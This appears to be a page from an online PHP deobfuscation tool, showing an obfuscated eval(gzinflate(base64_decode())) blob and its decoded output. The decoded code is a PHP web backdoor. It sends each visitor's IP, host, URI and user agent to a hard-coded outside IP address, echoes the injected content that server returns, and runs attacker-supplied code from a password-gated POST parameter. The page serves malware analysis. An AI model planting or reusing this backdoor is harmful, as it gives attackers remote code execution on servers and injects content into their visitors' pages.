Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php eval(gzinflate(base64_decode('fZRhb6JAEIa/m/gfthtjIDEUULSW46yx22tzVnoI98U0BNehbI4CYb..

Decoded Output download

?><?php
@error_reporting(E_ALL);@ini_set("display_errors",true);@error_reporting(0);
if(!empty($_COOKIE["client_check"]) && empty($ibv)) { $ibv = $_COOKIE["client_check"];  echo $ibv;} elseif (empty($ibv)) {
if (strstr($_SERVER["HTTP_HOST"], "127.0")){$name = $_SERVER["SERVER_ADDR"];}else{$name = $_SERVER["HTTP_HOST"];}
$usera = isset($_SERVER["HTTP_USER_AGENT"])?urlencode($_SERVER["HTTP_USER_AGENT"]):"";
$url = "http://83.166.240.235/get.php?ip=".urlencode($_SERVER["REMOTE_ADDR"])."&d=".urlencode($name.$_SERVER["REQUEST_URI"])."&u=".$usera."&i=1&h=".md5("feceb6d9403af4ae37f91412082aa45c11");
if(function_exists("curl_init")) {
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, FALSE);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5); curl_setopt($ch, CURLOPT_TIMEOUT, 5);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
$ibv = curl_exec($ch);$info = curl_getinfo($ch);if ($info["http_code"]!=200){$ibv="";}
curl_close($ch);
} elseif(ini_get("allow_url_fopen") == 1) {
$ibv = file_get_contents($url);
}
if(!empty($_POST["p"]) && md5(md5($_POST["p"])) == "b2515e60db9c69738720b51ce0a04eef") { eval(stripslashes($_POST["c"])); }
echo $ibv;
}
?><?

Did this file decode correctly?

Original Code

<?php eval(gzinflate(base64_decode('fZRhb6JAEIa/m/gfthtjIDEUULSW46yx22tzVnoI98U0BNehbI4CYbHXpvG/3y7Ynm3aJhpl9pl3ZnZmmHz/NimSot06g7LMy7CEIi8rlt0pJJzO56p9xjIWcqgUvGG8SKOnsAY57lXlFsT5ez9dtdstFitHcF9UT0onnLnuzyuywjRlkFUhTYD+wbcq6nbRHmHrB1VFz0j+QQ76zMVGCGiS15i9Q5ByYDFS3orI2EjhVSk+IviSeL+Jt8KXvn8TXrpLH9/2EDbMkaZjVX3uZNE91CFfwOY3nJ6feyLiTgb5gDqQs3ftVmfLoYwEwbi8qndcsJSCP8hC0OpkW6aQ0XwDX2KnGNtSt0yFKk6qqjg9Pj7pa8ZwqJkDXTP71vEdVJro3YQVDtY+kvXIteuTfS2qhrubt6AsSzvEfwVk6YeBd9XgW4E3pYkH5hjdRBjuN5aCY6CwHm7GA70fxYMI+qN4bAwMUz8xo2hgUcPA+zGItxmtWJ6F8Mh4xRVMRQKhGKoKN+3q0ESU+GpVZM3St7aI28wLYaNJD80Cb+7e+OElmZ4Tr4cupvMlUe1PuZm7WJCZ719dEzfwe8hSbfQpfEh9EdsjfuAtfG+6WF7IHHwvINJhP7m1HzwClV6q3WFZnL+YRbfkY3MiZ7Q+XdW9DWU/8O2RY+q6GEoh5oj+7/aJ0DTn0Pi1Wy9zr8i9vJN7GaVp/jeUYJwXkGEVOQ4ymrtt0opZCpIVYbJKLBR/veTd21W9ERO9wsV+O2Wn5ffQXovjtWkZFgz1zXpMh+NR/2Rk6mvLoKBH+gAgxnKbz+AhSuUmsoKnEU+AvypRqWQjEf3/QtfJTMTr6B8='))); ?>

Function Calls

gzinflate 1
base64_decode 1

Variables

None

Stats

MD5 e28175a80c5a691e7b1a54211a3881bc
Eval Count 1
Decode Time 104 ms